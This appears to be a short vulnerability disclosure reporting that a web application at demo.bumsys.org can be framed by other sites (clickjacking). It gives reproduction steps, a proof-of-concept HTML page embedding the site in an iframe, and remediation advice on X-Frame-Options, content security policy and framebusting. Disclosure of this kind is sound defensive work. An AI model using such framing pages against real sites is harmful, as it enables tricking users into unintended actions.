The web application does not restrict or incorrectly restricts frame objects or UI layers that belong to another application or domain, which can lead to user confusion about which interface the user is interacting with
1. Create a New HTML file as shown in below i.e Test.html
2. Put `<iframe src="http://demo.bumsys.org/" width="1000" height="1000"></iframe>`
3. Save the File
4. Open the File(Test.html) in Browser(i.e Firefox )
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Clickjacking Attack</title>
</head>
<body>
<p>This Page is Vulnerable to Clickjacking</p>
<iframe src="http://demo.bumsys.org/" width="1000" height="1000"></iframe>
</body>
</html>
https://drive.google.com/file/d/12iuOMyGVS9qz5j3638PAVdYvhCipTfbi/view?usp=sharing
It's important to implement the X-Frame-Options header, using a content security policy (CSP), and enabling browser features like Framebusting.